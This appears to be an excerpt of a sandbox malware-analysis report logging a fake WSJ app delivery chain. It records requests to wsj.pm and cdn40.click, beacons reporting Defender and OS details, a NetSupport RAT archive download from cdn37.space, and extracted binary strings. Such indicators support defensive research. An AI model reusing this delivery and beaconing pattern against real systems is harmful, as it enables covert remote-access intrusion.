Source: global traffic	HTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: 120X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAfzLBKdQCm28CuuxSNuYztu7EsL7kM769LErRWmNGF0YaycAS/EF10D5AFL6ce5V6NubDyyAlEankxphWwbF3Zkcodae1JTiS82W5IqxsAZeIGIp7QaY6JTHKtRqt6KEyC7zcbmSdNqvjmfJnoE%2BYuJIWIOMvj9e61j67iSOsaW5yPtDm6A2Ko8k4kHvl9/y4OUYw7tos%2BqX7a4ajNojcn/%2BDbwK3H1IdFpEKv1oyFblwSLD/wqQ%2BOO4/XbmYMWd13OqRnoWy5/spJAcJnE8ZC9LKpqS2jPGInoQC6TbPU/y5J%2BxITZtEzQSCHjr16fdOhoPhBPAuaWyDmETEVNgdiwDZgAACKN/6GJ5hpirqAEcFppM/deTNK56h1fTsecQj6efW5sXGKIkb3Vb8yln%2BfGBzzH0wpS8cDLWTHoIgQzzC8PG/u1cCyFQ4nVgzCHM/ePS3Oe6yjui0nWDzNf2nMzcumEakiioNdNK/kN%2B1GY321OPE3p/BvtKwSMdr1%2Bc2IySS9Vc5o2PMLFR0q9euc9w%2BfJliN1EmcTHg9RYAomP3lXn763OoOEhblBx/VJrrUuwAaONp6Htg2s9szOieqv9dfGEkmwIUPkreePKED3QSTHdizIvkyD2ArEj181uEfEKFN0m7phP9ItbB05/LfQ82qVa7S6QucixnvjrolClT5Lwdc9T1w9T2XaIOYyzpmi%2BzcvTSudcp03zV9iyFr63AAle78T86hWtHziucLicgJTKDs/b8TV2EpUjPEIBRV2u81H4fMkbTaoOHVey9jj6iYx%2B/pAGeatoNz1Bsbn1XMcY5R9nv379Aax/6bj%2Brwhs6trImm9Q3jabPfKdI0HDeiZI747w1MqX/lOOi61lecoVwppq42ulTvxSMkQNCgWZN5djPBDl1ScMHpQTrnIAlpjTeycr2gE%3D%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1714057116User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 75625C546F974997B6B8D64F1964277DX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic	HTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/WSJ.msix HTTP/1.1Host: cdn40.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /download.php HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1User-Agent: myUserAgentHereHost: cdn37.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
Source: global traffic	HTTP traffic detected: GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1User-Agent: myUserAgentHereHost: cdn40.clickConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: wsj.pm
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: cdn40.click
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdn37.space
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e4f9eb7b94-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e82dd844fb-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:47 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32eb4ea069f2-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Source: client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
